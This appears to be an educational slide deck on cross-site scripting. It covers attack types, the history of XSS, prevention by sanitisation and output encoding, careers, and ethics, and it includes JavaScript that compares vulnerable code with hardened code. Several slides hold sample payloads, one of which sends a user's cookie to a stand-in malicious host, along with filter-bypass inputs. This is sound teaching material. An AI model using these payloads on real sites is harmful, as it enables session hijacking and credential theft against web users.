
Cross-Site Scripting (XSS)

Joni Hall and Daniel Tumser

Overview

Table of Contents
● Introduction
● Related Works
● Technical Aspects
● Types of XSS
  o Reflected XSS
  o Stored XSS
  o DOM-Based XSS
  o Prevention
● Careers and Jobs
● Social Impact
● Ethical Impact
● Future Expectations
● Conclusion
● References

Introduction
● Cross-Site Scripting (XSS) occurs when an attacker uses a web application to gather data from a user
● Attackers inject JavaScript into an application to fool a user into giving up data
● Every month roughly 10-25 XSS holes are found in commercial products, and advisories are published explaining the threat.

Related Works
● 1995 - Netscape releases JavaScript
● 1999 - David Ross (Microsoft) publishes “Script Injection” paper
● 2000 - Microsoft works with CERT
● 2005 - Samy Kamkar attacks MySpace
● 2006 - Cross-Site Scripting malware popular
  o port scanners, keyloggers, etc.
● 2007 - XSS #1 on the Open Web Application Security Project (OWASP) Top Ten list
● 2010 - XSS #2 on OWASP Top Ten list
● 2013 - XSS #3 on OWASP Top Ten list

Technical Aspects
● Leverages JavaScript to attack the user
  o JS is a client-side processed scripting language
● General aim of the attack is session hijacking or credential stealing
  o ex. steal the user's cookie and use the web app as them
● Can compromise the entire application through its users

Reflected XSS
● Most common form of XSS vulnerability (roughly 75% of cases)
● Vulnerability
  o Improper filtering/sanitization of HTTP parameters or user input that are processed by server-side scripts and reflected in the HTML the client receives
● Exploit
  o Crafted input by malicious user is added to a URL and sent to target user
  o http://www.something.com/thing.cgi?param=<script>document.location="http://www.maliciousSite.com/?"+document.cookie;</script>
● Problem
  o Relies on target user having an active session to hijack

Stored XSS
● Attack stored in application servers
● Vulnerability
  o Improper user input sanitization in forms and user-created content instead of HTTP request params
● Exploit
  o Malicious script is injected into the page content viewed by other users
  o ex. MySpace content (by Samy), eBay sale listing (by Shubham Upadhyay): '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")</script>
● Why it's more dangerous
  o Other users will already have an active session with the application in order for malicious code to be processed on their browser

XSS Illustrated (diagram slide)

DOM-Based XSS
● All client-side processing, no server processing
● Vulnerability
  o Improper JS data handling
● Exploit
  o Leverages the Document Object Model, pulling data with AJAX, and client-side processing
● Example
  o Next slide, from the Open Web Application Security Project (OWASP)

DOM-Based XSS Example
● Expected URL in HTTP request; the parameter decides the default language to display
  o http://www.some.site/page.html?default=French
● Malicious URL
  o http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
● Script in HTTP response from server
  o document.write("<OPTION value=1>"+document.location.href.substring(document.location.href.indexOf("default=")+8)+"</OPTION>");
  o All processing references made to the Location object in the Document object for the web page in the browser (document.location)
  o Specifically to the value sent as the "default=" parameter

DOM-Based XSS Example Cont.
● Browser processes the script received from the server, which
● injects the malicious URL parameter script into the DOM when rendering the page, which
● executes the malicious script
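The OWASP language-selector snippet quoted on the previous slide, modelled as plain string functions so it runs under Node without a browser, beside a hardened version. This is an added example, not code from the slides or from OWASP; the function names buildOptionUnsafe, selectedLanguage and buildOptionSafe, the allowlist of languages and the fallback are assumptions made for the demonstration. The argument href stands in for document.location.href. The hardened form also covers the case the original code gets wrong when the parameter is absent (indexOf returns -1, so substring starts at offset 7).

```javascript
// Added example (not from the slides): the OWASP language-selector snippet
// modelled as string functions. `href` stands in for document.location.href.

// Vulnerable form: reproduces the slide's substring() extraction and
// writes the raw parameter straight into markup.
function buildOptionUnsafe(href) {
  const value = href.substring(href.indexOf("default=") + 8);
  return "<OPTION value=1>" + value + "</OPTION>";
}

// Hardened form: parse the URL properly, read the parameter by name, and
// accept only values from an allowlist (constructed for this example).
// With an allowlist the emitted value is never attacker-controlled text.
const ALLOWED_LANGUAGES = ["English", "French", "German"];
const FALLBACK_LANGUAGE = "English";

function selectedLanguage(href) {
  let param;
  try {
    param = new URL(href).searchParams.get("default"); // null when absent
  } catch (e) {
    return FALLBACK_LANGUAGE; // unparsable href: never trust it
  }
  return ALLOWED_LANGUAGES.includes(param) ? param : FALLBACK_LANGUAGE;
}

function buildOptionSafe(href) {
  return "<OPTION value=1>" + selectedLanguage(href) + "</OPTION>";
}

// Constructed inputs: the slide's expected URL and its malicious URL.
const EXPECTED_URL = "http://www.some.site/page.html?default=French";
const MALICIOUS_URL =
  "http://www.some.site/page.html?default=<script>alert(document.cookie)</script>";

console.log("unsafe :", buildOptionUnsafe(MALICIOUS_URL)); // reflects the script tag
console.log("safe   :", buildOptionSafe(MALICIOUS_URL));   // falls back to English
console.log("safe   :", buildOptionSafe(EXPECTED_URL));    // French
```

If the parameter had to carry free text rather than a value from a fixed set, the safe version would additionally need HTML-encoding of the value before concatenation, or better, setting it through a DOM property such as textContent instead of document.write.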

Preventing XSS
● Recursive sanitization
  o When processing a client HTTP request or user-supplied data, it must be sanitized
  o Why recursive?
    Wrapping commonly sanitized characters or sub-strings, ex. <scr<script>ipt> . . . </scr</script>ipt> becomes… <script> . . . </script>
● Properly handle encoding/decoding
  o URL encoding / percent encoding
    One method attackers use to bypass literal character filtering is to encode known untrusted/dangerous characters (ex. %3C = '<')
  o HTML encoding / decoding
    Another method for bypassing these filters is to HTML encode those characters injected into the document to be decoded back into scripts when the page is rendered
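The three points above worked through in code, as an added example that is not part of the slides: a single-pass tag filter against the wrapped <scr<script>ipt> input, the recursive version of the same filter, and the approach the cited OWASP cheat sheet actually recommends, which is to canonicalise input once (percent-decode) and then encode for the output context rather than trying to strip dangerous strings. The function names, the entity table and all sample inputs are constructed for the demonstration.

```javascript
// Added example (not from the slides): single-pass vs recursive filtering,
// and contextual output encoding. All sample inputs are constructed.

const SCRIPT_TAG = /<\/?script>/gi;

// Naive filter: strips <script> and </script> in one pass. The wrapped
// input below survives because removing the inner tag assembles a new one.
function stripScriptOnce(input) {
  return input.replace(SCRIPT_TAG, "");
}

// Recursive filter: repeats until a pass changes nothing, so tags that
// appear only after an inner tag was removed are caught too.
function stripScriptRecursive(input) {
  let previous;
  let current = input;
  do {
    previous = current;
    current = previous.replace(SCRIPT_TAG, "");
  } while (current !== previous);
  return current;
}

// Canonicalise once: percent-decode so %3C is seen as '<' before any
// decision is made. decodeURIComponent throws on malformed sequences such
// as "%ZZ"; those are kept as literal text rather than rejected here.
function percentDecode(input) {
  try {
    return decodeURIComponent(input);
  } catch (e) {
    return input;
  }
}

// Output encoding for an HTML text context. Encoding '&' as well is what
// defeats the "send it already HTML-encoded" bypass: an attacker-supplied
// &lt; becomes &amp;lt; and is displayed as text, never decoded into a tag.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function htmlEncode(input) {
  return input.replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Pipeline for untrusted data that will be placed in HTML text: decode
// exactly once at the boundary, encode exactly once at output.
function safeForHtmlText(raw) {
  return htmlEncode(percentDecode(raw));
}

// Constructed inputs matching the slide's three bypass techniques.
const WRAPPED = "<scr<script>ipt>alert(1)</scr</script>ipt>";
const PERCENT = "%3Cscript%3Ealert(1)%3C/script%3E";
const PRE_ENCODED = "&lt;script&gt;alert(1)&lt;/script&gt;";

console.log("once      :", stripScriptOnce(WRAPPED));      // <script>alert(1)</script>
console.log("recursive :", stripScriptRecursive(WRAPPED)); // alert(1)
console.log("once      :", stripScriptOnce(PERCENT));      // unchanged: filter never saw a '<'
console.log("encoded   :", safeForHtmlText(PERCENT));      // &lt;script&gt;alert(1)&lt;/script&gt;
console.log("encoded   :", safeForHtmlText(PRE_ENCODED));  // &amp;lt;script&amp;gt;...
```

The recursive filter fixes the one trick shown on the slide but still depends on a list of strings to remove; the encoding path needs no such list, because every character that could change the meaning of the surrounding HTML is neutralised regardless of how it was smuggled in. Decoding should happen once, normally in the web framework; decoding again later is itself a common source of bypasses.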

Careers and Jobs

Web Developer

Job Growth Projection (2012-2022)
● Jobs in 2012 / 2022
  o 141,400 / 169,900
● 10-year growth
  o +20% / +28,500

Web Developer Pay (2012)
● Median wage (web devs.)
  o $62,500
● vs. median wage (all occupations)
  o x1.8

Careers and Jobs

Web Developer

Skills
● HTML
● JavaScript
● PHP
● C#
● jQuery
● CSS
● Java
● SQL
● Ruby on Rails
● .NET
● ASP.NET
● MySQL

Careers and Jobs

Penetration Tester

Skills
● Web Security and Encryption
● Network Security management
● Security Testing and Auditing
● Computer Security

Careers and Jobs

Web Application Security Engineer

Minimum Qualifications
● Bachelor's degree and 3 years of professional work experience (or a master's degree)

Additional Qualifications
● Experience in
  o developing web applications in Java, Ruby or JavaScript
  o OWASP or NIST 800-64
  o application security assessment tools
  o IT Security user groups or security certification (CISSP, CEH, OSCP, etc.)
(MathWorks job listing)

Careers and Jobs

Platform/Browser Engineer & Security Engineer

Firefox Platform Engineer
Minimum Qualifications
● Experience
  o writing code. College degree is not necessary or sufficient.
  o Expertise in any of C++, JavaScript, or Python.
  o Experience debugging or profiling.
Desired Skills
● C++; JavaScript; x86, x86_64, or ARM
● Experience with cryptographic signing and verification.
● Experience with security threat models.
● and more

Platform Security Engineer
Minimum Qualifications
● BS in Computer Science (or equivalent) plus 3-5 years industry experience
● Strong knowledge of C++ and JavaScript
● Strong privacy or security background
● Experience working in a security or development team
● Experience in contributing to large open source projects is a plus
● Excellent verbal and written communication skills

Social Impact

● Link mistrust?
  o Users still lax and ignorant
  o Hackers/hacking still a very opaque subject to most
● Train users?
  o Organizations already do
  o They get the training wrong
  o Users are still making dumb mistakes (ex. only hovering over a link to check if the domain matches)

Ethical Impact

Offensive/Malicious Perspective

Don't do it (without permission)

It's unethical and very illegal. Unless you like fines, 5-20 years in prison (Title 18 U.S. Code § 1030(c)) and civil litigation.

Ethical Impact

Defensive/Developer Perspective

● Developers have an ethical and sometimes legal responsibility to their clients.
  o XSS can result in the compromise of the entire application in addition to client accounts
  o Client compromise can disclose PII, and app compromise can mean total data breach and network compromise
● Data breach disclosure is required by law in every state but New Mexico, Alabama and South Dakota
  o Very damaging for a company financially and to client trust relationships

Secure your code!

Future Expectations

● One estimate is that 94% of web applications are vulnerable to XSS
  o Every month roughly 10-25 XSS holes are found in commercial products
● Jobs
  o The Bureau of Labor Statistics expects a 37% increase for InfoSec professionals 2012-2022
● Prevention by consumer education is key!

Conclusion

● Almost all web applications are vulnerable to XSS
● XSS has been on OWASP's Top Ten list for 8 years
● Repercussions to XSS?
  o possible to probable jail-time and fines
● Preventing XSS?
  o biggest burden lies in consumer/user education
● Jobs?
  o expecting increase of 37% (2012-2022); all computer systems need security

References
1. Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws. 2nd ed. Indianapolis: Wiley, 2011. Print.
2. "The Cross-Site Scripting (XSS) FAQ." Web and Application Security News. Web. 17 June 2015. http://www.cgisecurity.com/xss-faq.html.
3. "XSS (Cross Site Scripting) Prevention Cheat Sheet." OWASP. Web. 17 June 2015. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet.
4. "A Short History of JavaScript." Web Education Community Group. Web. 17 June 2015. https://www.w3.org/community/webed/wiki/A_Short_History_of_JavaScript.
5. "History of Cross Site Scripting." Increased Visibility. Web. 17 June 2015. http://intellavis.com/blog/?p=284.
6. "Types of Cross-Site Scripting." OWASP. Web. 17 June 2015. https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting.
7. "Securing Your Web Browser." CERT. Web. 17 June 2015. https://www.us-cert.gov/publications/securing-your-web-browser.
8. Saxena, Prateek. "Systematic Techniques for Finding and Preventing Script Injection Vulnerabilities." Electrical Engineering and Computer Sciences, University of California at Berkeley, 29 June 2012. Web. 17 June 2015. http://www.eecs.berkeley.edu/Pubs/TechRpts/2012/EECS-2012-170.pdf.
9. Klein, Amit. "Cross Site Scripting Explained." Sanctum Security Group, 1 June 2002. Web. 17 June 2015. https://crypto.stanford.edu/cs155/papers/CSS.pdf.
10. "Web Application Security Engineer." MathWorks Jobs. MathWorks. Web. 17 June 2015. http://www.mathworks.com/company/jobs/opportunities/web-application-security-engineer-14497?source=10192.
11. "Web Application Security Engineer Salary." Indeed. Web. 17 June 2015. http://www.indeed.com/salary?q1=Web Application Security Engineer&l1=.
12. "Web Application Developer Salary (United States)." PayScale. Web. 17 June 2015. http://www.payscale.com/research/US/Job=Web_Application_Developer/Salary.
13. "Web Developers." U.S. Bureau of Labor Statistics, 8 Jan. 2014. Web. 17 June 2015. http://www.bls.gov/ooh/computer-and-information-technology/web-developers.htm.
14. "Penetration Tester Salary (United States)." PayScale. Web. 17 June 2015. http://www.payscale.com/research/US/Job=Penetration_Tester/Salary.
15. "18 U.S. Code § 1030 - Fraud and Related Activity in Connection with Computers." Cornell University. Web. 17 June 2015. https://www.law.cornell.edu/uscode/text/18/1030.
